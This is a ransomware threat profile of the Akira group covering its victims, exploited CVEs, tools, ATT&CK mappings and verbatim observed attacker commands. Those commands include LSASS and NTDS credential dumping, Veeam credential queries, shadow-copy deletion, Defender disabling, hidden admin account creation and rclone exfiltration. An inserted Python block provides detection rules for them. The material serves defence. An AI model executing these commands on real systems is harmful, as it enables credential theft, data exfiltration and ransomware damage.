Akira Ransomware Threat Profile - Adversary Pursuit Group Blackpoint Cyber - 2024Q3


THREAT PROFILE: Akira Ransomware

Table of Contents
Executive Summary, p. 2
Description, p. 3
Previous Targets: Akira, p. 4
  Previous Industry Targets
  Previous Victim HQ Regions
Data Leak Site: Akira, p. 6
Known Exploited Vulnerabilities, p. 7
Associations: Akira, p. 8
Known Tools: Akira, p. 10
Observed Akira Behaviors, p. 15
  Windows
  Linux
MITRE ATT&CK® Mappings: Akira, p. 19
References, p. 25

THREAT PROFILE: AKIRA RANSOMWARE 1


Executive Summary

First Identified: 2023
Operation style: Ransomware-as-a-Service (RaaS); the affiliate payment structure is unknown; however, it is likely similar to other RaaS operations (80/20 split).
Extortion method: Double extortion, combining the traditional ransomware extortion method (encryption) with exfiltration of the victim's sensitive data; the group threatens to leak the data via a data leak site if the ransom demand is not paid.
Most frequently targeted industry: Industrials (Manufacturing)
Most frequently targeted victim HQ region: United States, North America
Known Associations: Exotic Lily, IQOJ Ransomware, Megazord Ransomware, ZHQ Ransomware, Conti Ransomware, Karakurt Hacking Team, xanonymoux

INITIAL ACCESS: Unauthorized logon to VPNs, exploiting external remote services, exploiting known vulnerabilities, social engineering, IABs (MITRE ATT&CK: T1078, T1133, T1190, T1199, T1566)
PERSISTENCE: Creating new accounts, browser extensions, server software components, boot or logon autostart execution (MITRE ATT&CK: T1136, T1176, T1505, T1547)
LATERAL MOVEMENT: Abuse of remote services, tainted shared content, lateral tool transferring (MITRE ATT&CK: T1021, T1080, T1563, T1570)



Description

Akira ransomware was first observed in March 2023 and operates in the double extortion method, where victims' data is stolen and leaked if the ransom is not paid. Akira has been linked to the former Conti operation through TTPs, behaviors, and blockchain analysis showing that Akira ransom payments were sent to Conti-affiliated wallets. In June 2023, Avast researchers released a decryptor for the Akira ransomware; however, the threat actors then modified their encryptor, indicating that the available decryptor no longer works. The group has been observed demanding ransom payments between 200,000 USD and 4 million USD.

Akira operators gain initial access by using unauthorized logon to VPNs, targeting accounts that did not have multi-factor authentication (MFA) enabled, specifically targeting Cisco VPN products, and by purchasing credentials or access from initial access brokers (IABs). Additionally, the operators have been observed targeting known vulnerabilities in Cisco, Fortinet, and Veeam products.

Akira's name is widely believed to be taken from a 1988 anime movie of the same name, and the operators emulate its aesthetic on their data leak site. The ransomware developers likely based their name on the powerful entity within the anime movie, or on its related manga.

The group's data leak site does not host actual stolen data like other ransomware operations. The group utilizes links that require torrenting software to download and view the stolen data. This tactic was previously observed in the Clop ransomware operation when it listed victims targeted via the MOVEit vulnerability in 2023.

In August 2023, a new variant of the Akira ransomware, Megazord, was observed being deployed. This variant was written in Rust and appends encrypted data with ".powerranges", whereas the previous version was written in Microsoft Visual C/C++ and appended encrypted data with ".akira". Additionally, two other variants of Akira, IQOJ and ZHQ, were identified in 2023. The ransom notes observed with these variants led victims to the Akira TOR site.

Additionally, Akira maintains a Linux version of the malware that uses various symmetric key algorithms for file encryption, including AES, CAMELLIA, DES, and IDEA. The Linux version excludes the same file extensions and directories from file encryption as the Windows version, and the ransom notes are the same. This indicates that the threat actor ported the Windows version to Linux.

In November 2023, prior victims of the Akira ransomware variant were contacted by a threat actor identifying themselves as "xanonymoux" who claimed to have gained access to a server hosting victim data exfiltrated by Akira. The threat actor then attempted to extort the victim for additional money in exchange for access to the server and/or deletion of the data from the Akira server. Additionally, xanonymoux claimed the Akira group was associated with the Karakurt Hacking Team; however, evidence of the connection remains unknown.

A ransomware variant with the same name was identified in 2017; however, analysis revealed that the current-day Akira is very likely a different operation.
Previous Akira Targets
Previous Industry Targets from 01 Jul 2023 to 30 Jun 2024 (number of incidents)

Industrials: 95 (Construction & Engineering 22, Manufacturing 44, Transportation 13, Other 16)
Consumer Cyclicals: 36 (Hotels & Entertainment 10, Retail 13, Other 13)
Technology: 26 (MSPs 1, Telecommunications 10, Other 15)
Professional & Commercial Services: 23 (Business Services 8, Legal Services 11, Other 4)
Academics: 14
Consumer Non-Cyclicals: 9
Energy: 6
Real Estate: 6
Institutions & Organizations: 6
Healthcare: 6
Financials: 4 (Insurance 2, Other 2)
Basic Materials: 2
Utilities: 1
Government: 1



Previous Targets: Akira
Previous Victim HQ Regions from 01 Jul 2023 to 30 Jun 2024 (number of incidents)

North America: 163
Europe: 47
South America: 12
Oceania: 8
Asia: 4
Africa: 1



Data Leak Site: Akira

hxxps://akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad[.]onion/
hxxps://akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id[.]onion/



Known Exploited Vulnerabilities

CVE-2019-6693 (CVSS: 7.5): Hardcoded Cryptographic Key Vulnerability. Product Affected: Fortinet FortiOS
CVE-2020-3259 (CVSS: 7.5): Information Disclosure Vulnerability. Product Affected: Cisco ASA and FTD
CVE-2022-40684 (CVSS: 9.8): Authentication Bypass Vulnerability. Product Affected: Fortinet FortiOS
CVE-2023-20269 (CVSS: 9.1): Unauthorized Access Vulnerability. Product Affected: Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Remote Access VPN
CVE-2023-27532 (CVSS: 7.5): Missing Authentication for Critical Function Vulnerability. Product Affected: Veeam Backup & Replication Cloud Connect
CVE-2023-48788 (CVSS: 9.8): SQL Injection Vulnerability. Product Affected: Fortinet FortiClient EMS
CVE-2024-37085 (CVSS: 6.8): Authentication Bypass Vulnerability. Product Affected: VMware ESXi



Associations: Akira

Punk Spider
Akira alias used by CrowdStrike.

Gold Sahara
Akira alias used by SecureWorks.

IQOJ Ransomware
A new variant of the Akira ransomware observed in 2023.

Megazord Ransomware
A new variant of the Akira ransomware observed in August 2023.

ZHQ Ransomware
A new variant of the Akira ransomware observed in 2023.

Exotic Lily
A financially motivated threat group that has been known to act as an initial access broker for other malicious actors, including Akira ransomware operators.

xanonymoux
In November 2023, security researchers reported that prior victims of Akira ransomware were contacted by an entity identifying themselves as "xanonymoux." The entity claimed to have obtained access to a server hosting the victim's data exfiltrated by Akira. The entity then attempted to extort the victim for additional funds in exchange for providing access to the purported server or deleting the data. The connection between Akira and xanonymoux remains unknown; however, other operations have been observed using additional extortion methods similar to this tactic.

Conti Ransomware
Security researchers have reported that the Akira ransomware variant bears resemblance to the Conti ransomware builder that was leaked in 2022. Akira ignores the same file types and directories as Conti and has similar functions. Additionally, Akira ransomware transactions overlap with Conti threat actors on multiple occasions. In at least three separate transactions, Akira sent the full amount of their ransom payments to Conti-affiliated addresses.

Karakurt Hacking Team
The entity xanonymoux claimed to prior victims of Akira ransomware that Akira was associated with the Karakurt Hacking Team. However, the entity did not elaborate on the connection and no additional connection has been identified.



Known Tools: Akira

7zip: A tool that is used to compress files into an archive. Used by threat actors to compress data before exfiltration.
AdFind: A free command-line query tool that can be used for gathering information from Active Directory.
Advanced IP Scanner: A fast and powerful network scanner with a user-friendly interface. It can locate all computers on your wired or wireless local network and scan their ports.
AnyDesk: A remote desktop application that provides remote access to computers and other devices.
BypassCredGuard: A utility used to bypass Windows Credential Guard.
Cloudflare Tunnel: A tool that provides users with a secure way to connect resources without a publicly routable IP address. It creates a secure, outbound-only connection between your services and Cloudflare by deploying a lightweight connector in your environment.
cmd: A program used to execute commands on a Windows computer.
decrypt.py: A script used for decrypting password data from Fortinet devices.
DonPAPI: A tool that can locate and retrieve Windows Data Protection API (DPAPI) protected credentials, aka DPAPI dumping.
FileZilla: A free open-source file transfer protocol software tool that allows users to set up FTP servers or connect to other FTP servers to exchange files.
fortiConfParser.py: A script used for remotely extracting the configuration of Fortinet devices.
Impacket: An open-source collection of modules written in Python for programmatically constructing and manipulating network protocols.
KillAV: A tool used to terminate antivirus-related services and processes.
LANSweeper: An IT discovery & inventory platform that delivers insights into the status of users, devices, and software within IT environments.
LaZagne: An open-source application used to retrieve passwords stored on a local computer.
Ligolo: A simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety.
LSASS: A Windows process that takes care of security policy for the OS.
MASSCAN: A port scanner that can detect whether ports are open, complete the TCP connection and interaction with the application at that port to grab simple banner information.
MEGA: A cloud storage and file hosting service.
Mimikatz: An open-source application that allows users to view and save authentication credentials, including Kerberos tickets.
Minidump: A C# implementation of Mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps.
MobaXterm: An application that provides X-Server capability for the Microsoft Windows OS. It allows applications running in the Unix/Linux environment to display graphical user interfaces on the MS Windows desktop.
Net: A Windows utility that is used in command-line operations for control of users, groups, services, and network connections. It can gather system and network information, move laterally through SMB/Windows Admin Shares, and interact with services.
NetPass: A legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user.
ngrok: A tool that exposes local servers behind NATs and firewalls to the public internet over secure tunnels.
Nltest: A Windows command-line utility used to list domain controllers and enumerate domain trusts.
Non-Sucking Service Manager: A service manager that manages background and foreground services and processes.
NTDSUtil: A command-line tool that provides management facilities for Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS).
PC Hunter: A toolkit for Windows with various powerful features for kernel structure viewing and manipulating.
PowerShell: A task automation and configuration management program that includes a command-line shell and the associated scripting language.
PowerTool: A security tool that scans and analyzes files at kernel level; it can help threat actors remove and disable security services/software.
PsExec: A utility tool that allows users to control a computer from a remote location.
PuTTY: A free and open-source terminal emulator, serial console, and network file transfer application.
Radmin: A remote access software that allows users to work on a remote computer in real time. Users can remotely access the same computer from multiple places and use advanced File Transfer function, multi-user Text and Voice chats, Remote Shutdown, and Telnet.
Rclone: A command-line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.
RDP: A protocol that provides a user with a graphical interface to connect to another computer over a network connection.
reconftw: A tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding vulnerabilities. It automates the entire process of reconnaissance for the user.
Remmina: An open-source remote desktop client for POSIX-based operating systems that allows users to connect to remote systems.
RustDesk: A remote access and remote control software, allowing threat actors to access victim machines remotely. The client is available for different operating systems.
ScreenConnect: AKA ConnectWise. A remote management software used to gain access to a remote computer.
SharpHound: The official data collector for BloodHound; it is written in C# and uses native Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems.
SMB: A client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network.
SoftPerfect: A network scanner that can ping computers, scan ports, discover shared folders and retrieve practically any information about network devices.
SystemBC: AKA Coroxy. A malware written in C that turns infected computers into SOCKS5 proxies.
Tasklist: A utility that displays a list of applications and services with their Process IDs for all tasks running on either a local or a remote computer.
Terminator.exe: A tool reportedly capable of bypassing 24 different AV, EDR, and XDR security solutions, including Windows Defender.
ToolPow: A tool that can be used to bypass security solutions.
VeeamHax.exe: A plaintext credential leaking tool.
VmConnect.exe: A tool that enables users to connect to and manage virtual machines running on Hyper-V hosts.
WebBrowserPassView: A password recovery tool that reveals the passwords stored by web browsers.
WinAPI: Microsoft's core set of application programming interfaces available in the Microsoft Windows OS. It creates and uses windows to display output, prompt for user input, and carry out the other tasks that support interaction with the user.
Windows Restart Manager: A library for reducing required reboots during software updates. The tool is often used by threat actors to support the encryption process and retrieve processes running on the system.
WinRAR: A trialware file archiver utility for Windows devices that can back up data and reduce the size of email attachments, open and unpack RAR, ZIP and other files downloaded from the Internet, and create new archives in RAR and ZIP file format.
WinSCP: A free and open-source SFTP, FTP, WebDAV, S3, and SCP client for Windows that can be used to exfiltrate files to a remote server.
WMIExec: A tool that allows threat actors to execute commands on a remote system and/or establish a semi-interactive shell on a remote host.



Observed Akira Behaviors: Windows

Command and Control
"C:\Users\<user>\Downloads\AnyDesk.exe" --install "C:\Program Files (x86)\AnyDesk" --start-with-win --create-shortcuts --create-taskbar-icon --create-desktop-icon --install-driver:mirror --install-driver:printer --update-main --svc-conf "C:\Users\<user>\AppData\Roaming\AnyDesk\service.conf" --sys-conf "C:\Users\<user>\AppData\Roaming\AnyDesk\system.conf"
"C:\Users\<user>\Downloads\dwagent.exe"
"cmd.exe" /c C:\ProgramData\Microsoft\crome.exe

Credential Access
cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 572 C:\ProgramData\lsass.dmp full
"cmd.exe" /c C:\ProgramData\Cl.exe -c -i C:\Windows\NTDS\ntds.dit -o C:\programdata\nt.txt
"cmd.exe" /c C:\ProgramData\Cl.exe -c -i c:\Windows\System32\config\SYSTEM -o C:\programdata\sys
ntdsutil "ac i ntds" "ifm" "create full c:\Programdata\temp\Crashpad\Temp\abc" q q
sqlcmd.exe -S localhost,60261 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc] FROM [VeeamBackup].[dbo].[Credentials];"
esentutl.exe /y "C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp"
C:\Windows\system32\NOTEPAD.EXE \\<Redacted>\it\KeePass\Department Cloud Accounts - Backup Codes\-backup-codes.txt
C:\Users\testrdp\Downloads\Mimik\Pass\BypassCredGuard.exe
C:\Users\testrdp\Downloads\Mimik\Pass\WebBrowserPassView.exe
C:\Users\testrdp\Downloads\Mimik\Pass\netpass64.exe
C:\Users\testrdp\Downloads\Mimik.exe
cmd.exe /Q /c esentutl.exe /y "C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db" /d "C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db.tmp"



Defense Evasion
New Value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\
runas /netonly /user:<username>\<username> cmd
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"
Set-MpPreference -DisableRealtimeMonitoring $true

Discovery
"C:\Windows\system32\cmd.exe" /c net localgroup Administrators
"C:\Windows\system32\net.exe" localgroup administrators
Get-ADComputer -Filter * -Property * | Select-Object Enabled, Name, DNSHostName, IPv4Address, OperatingSystem, Description, CanonicalName, servicePrincipalName, LastLogonDate, whenChanged, whenCreated > C:\ProgramData\AdComp[.]txt
FindFirstFileW()
FindNextFileW()
GetLogicalDriveStrings()
C:\Users\<user>\Desktop\netscan_n.exe
C:\users\<user>\appdata\local\temp\3\advanced ip scanner 2\advanced_ip_scanner.exe
C:\Users\<user>\Desktop\Advanced_IP_Scanner_2.5.4594.1.exe

Exfiltration
"C:\Users\<user>\Downloads\winrar-x64-623.exe"
rclone copy \\192.168.XXX.214\f$ st:"/home/.../.../F" --max-age 1y --exclude "*. [excluded files] -q --ignore-existing --auto-confirm --multi-thread-streams 25 --transfers 25 -P

Impact
C:\w[.]exe
C:\Users\install\Downloads\w[.]exe
\\192.168.XXX.37\c$\w[.]exe
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"
start 1.exe -p="\\<redacted>\C$" -n=10
start 1.exe -p="\\<redacted>\<redacted>$" -n=10
start 1.exe -p="\\<redacted>\D$" -n=10



Persistence
C:\Windows\system32\net1 user <username> <RedactedPassword> /ADD
C:\Windows\system32\net1 localgroup Administrators <username> /ADD
"C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v <username> /t REG_DWORD /d 0 /f
rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full
net group "ESX Admins" /domain /add
net group "ESX Admins" <username> /domain /add
net user admin P@ssw0rd! /add
net localgroup "administrators" admin /add
net group "Domain admins" /dom
net localgroup "Administrators" /dom
nltest /DOMAIN_TRUSTS
nltest /dclist:
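The command lines in the Windows behavior tables above are the kind of thing that shows up verbatim in process-creation telemetry (Sysmon event 1, Windows Security event 4688, EDR command-line fields). The following Python matcher is an added example, not code from the Blackpoint Cyber profile or from Akira: it encodes a handful of the observed patterns (comsvcs.dll MiniDump, ntdsutil IFM, the Veeam credential query, esentutl copies of browser credential stores, shadow copy deletion, Defender tampering, net user /add, the SpecialAccounts\Userlist registry write, and rclone copies from admin shares) as regex rules, tags each with a technique ID taken from this profile's MITRE ATT&CK mapping section, and runs them over constructed sample events. The rule names, hostnames and sample command lines are constructed for illustration and are not real telemetry.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str        # constructed, descriptive rule name
    technique: str   # ATT&CK technique ID taken from the profile's mapping section
    pattern: re.Pattern


# Each regex keys on a distinctive token of a command line listed in the
# Windows behavior tables above; all patterns are case-insensitive.
RULES = [
    Rule("LSASS dump via comsvcs.dll MiniDump", "T1003.001",
         re.compile(r"comsvcs\.dll\s*,\s*MiniDump", re.I)),
    Rule("ntdsutil IFM export of NTDS.dit", "T1003",
         re.compile(r"\bntdsutil\b.*\bifm\b", re.I)),
    Rule("Veeam credential table queried with sqlcmd", "T1555",
         re.compile(r"\bsqlcmd\b.*\[VeeamBackup\]\.\[dbo\]\.\[Credentials\]", re.I)),
    Rule("Browser credential store copied with esentutl", "T1555.003",
         re.compile(r"\besentutl(\.exe)?\s+/y\s+.*(Login Data|key4\.db)", re.I)),
    Rule("Shadow copies deleted via WMI", "T1490",
         re.compile(r"Win32_Shadowcopy\s*\|\s*Remove-WmiObject", re.I)),
    Rule("Defender real-time monitoring disabled", "T1562.001",
         re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.I)),
    Rule("Defender path exclusion added", "T1562.001",
         re.compile(r"Windows Defender\\Exclusions\\Paths", re.I)),
    Rule("Local account created with net user /add", "T1136.001",
         re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    Rule("Account hidden from logon screen via SpecialAccounts\\Userlist", "T1112",
         re.compile(r'\breg(\.exe)?"?\s+add\s+.*SpecialAccounts\\Userlist', re.I)),
    Rule("rclone bulk copy from an admin share", "T1048",
         re.compile(r"\brclone\s+copy\s+\\\\", re.I)),
]


def match_command(cmdline: str) -> list[tuple[str, str]]:
    """Return (rule name, technique ID) for every rule that matches one command line."""
    return [(r.name, r.technique) for r in RULES if r.pattern.search(cmdline)]


def scan_events(events: list[dict]) -> list[dict]:
    """Run every rule over a list of {"host", "cmdline"} process-creation events."""
    findings = []
    for ev in events:
        for name, technique in match_command(ev["cmdline"]):
            findings.append({"host": ev["host"], "rule": name,
                             "technique": technique, "cmdline": ev["cmdline"]})
    return findings


# Constructed sample events, modelled on the command lines in the profile.
# Hostnames, paths and the placeholder password are illustrative only.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": r'cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 572 C:\ProgramData\lsass.dmp full'},
    {"host": "dc01", "cmdline": r'ntdsutil "ac i ntds" "ifm" "create full c:\Programdata\temp\abc" q q'},
    {"host": "bk01", "cmdline": r'sqlcmd.exe -S localhost,60261 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password] FROM [VeeamBackup].[dbo].[Credentials];"'},
    {"host": "ws01", "cmdline": r'cmd.exe /Q /c esentutl.exe /y "C:\Users\u\AppData\Roaming\Mozilla\Firefox\Profiles\abcd.default-release\key4.db" /d "C:\Users\u\AppData\Local\Temp\key4.db.tmp"'},
    {"host": "ws02", "cmdline": r'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"'},
    {"host": "ws02", "cmdline": r'powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true'},
    {"host": "ws02", "cmdline": r'C:\Windows\system32\net1 user svc_backup <placeholder-password> /ADD'},
    {"host": "ws02", "cmdline": r'"C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v svc_backup /t REG_DWORD /d 0 /f'},
    {"host": "fs01", "cmdline": r'rclone copy \\192.0.2.14\f$ st:/home/x/F --max-age 1y -q --ignore-existing --transfers 25 -P'},
    {"host": "ws03", "cmdline": r'notepad.exe C:\Users\u\notes.txt'},  # benign control event
]


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['host']:5} {f['technique']:10} {f['rule']}")
```

The rules deliberately key on tokens that are rare in normal administration (a comma after comsvcs.dll, the Veeam Credentials table name, an esentutl copy whose source is a browser profile file) rather than on the tool name alone, which keeps false positives down on hosts where rundll32, esentutl or net are in routine use; the SpecialAccounts\Userlist write and the Defender exclusion rule are worth alerting on regardless of which process issued them.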



Observed Akira Behaviors: Linux

Encryption: CryptAcquireContextW(), CryptImportPublicKeyInfo(), CryptGenRandom(), CryptEncrypt()

Command-line options
Encrypts local device only: -localonly or ly
File that contains paths and devices to encrypt: --share_file or -s
Specifies path where files will be recursively encrypted: --encryption_path or -p
Type of encryption to apply: --encryption_percent or -n



MITRE ATT&CK® Mappings: Akira

Reconnaissance
T1595: Active Scanning (.002: Vulnerability Scanning)

Resource Development
T1584: Compromise Infrastructure
T1588: Obtain Capabilities (.002: Tool)

Initial Access
T1078: Valid Accounts
T1133: External Remote Services
T1190: Exploit Public-Facing Application
T1195: Supply Chain Compromise
T1199: Trusted Relationship
T1566: Phishing (.001: Spearphishing Attachment; .002: Spearphishing Link)

Execution
T1047: Windows Management Instrumentation
T1059: Command and Scripting Interpreter (.001: PowerShell; .002: AppleScript; .003: Windows Command Shell)
T1106: Native API
T1129: Shared Modules
T1204: User Execution (.001: Malicious File)

Persistence
T1136: Create Account (.001: Local Account; .002: Domain Account)
T1176: Browser Extensions
T1505: Server Software Component (.003: Web Shell)
T1547: Boot or Logon Autostart Execution (.001: Registry Run Keys / Startup Folder; .009: Shortcut Modification)

Privilege Escalation
T1098: Account Manipulation
T1547: Boot or Logon Autostart Execution (.001: Registry Run Keys / Startup Folder; .009: Shortcut Modification)

Defense Evasion
T1006: Direct Volume Access
T1027: Obfuscated Files or Information (.001: Binary Padding; .005: Indicator Removal from Tools)
T1036: Masquerading (.005: Match Legitimate Name or Location)
T1112: Modify Registry
T1222: File and Directory Permissions Modification (.001: Windows File and Directory Permissions Modification)
T1497: Virtualization/Sandbox Evasion
T1550: Use Alternative Authentication Material (.002: Pass the Hash)
T1562: Impair Defenses (.001: Disable or Modify Tools)
T1622: Debugger Evasion

Credential Access
T1003: OS Credential Dumping (.001: LSASS Memory)
T1555: Credentials from Password Stores (.003: Credentials from Web Browsers)
T1557: Adversary-in-the-Middle (.001: LLMNR/NBT-NS Poisoning and SMB Relay)

Discovery
T1010: Application Window Discovery
T1012: Query Registry
T1016: System Network Configuration Discovery
T1018: Remote System Discovery
T1046: Network Service Discovery
T1057: Process Discovery
T1069: Permission Groups Discovery (.001: Local Groups; .002: Domain Groups)
T1082: System Information Discovery
T1083: File and Directory Discovery
T1087: Account Discovery (.001: Local Account Discovery)
T1135: Network Share Discovery
T1482: Domain Trust Discovery
T1518: Software Discovery (.001: Security Software Discovery)
T1614: System Location Discovery

Lateral Movement
T1021: Remote Services (.001: Remote Desktop Protocol; .002: SMB/Windows Admin Shares; .004: SSH)
T1080: Taint Shared Content
T1563: Remote Service Session Hijacking (.002: RDP Hijacking)
T1570: Lateral Tool Transfer

Collection
T1005: Data from Local System
T1114: Email Collection (.001: Local Email Collection)
T1185: Browser Session Hijacking
T1560: Archive Collected Data (.001: Archive via Utility)

Command and Control
T1090: Proxy
T1105: Ingress Tool Transfer
T1219: Remote Access Software

Exfiltration
T1020: Automated Exfiltration
T1029: Scheduled Transfer
T1041: Exfiltration Over C2 Channel
T1048: Exfiltration Over Alternative Protocol (.003: Exfiltration Over Unencrypted Non-C2 Protocol)
T1537: Transfer Data to Cloud Account
T1567: Exfiltration Over Web Service (.002: Exfiltration to Cloud Storage)

Impact
T1486: Data Encrypted for Impact
T1489: Service Stop
T1490: Inhibit System Recovery
T1531: Account Access Removal
T1657: Financial Theft



Adversary Pursuit Group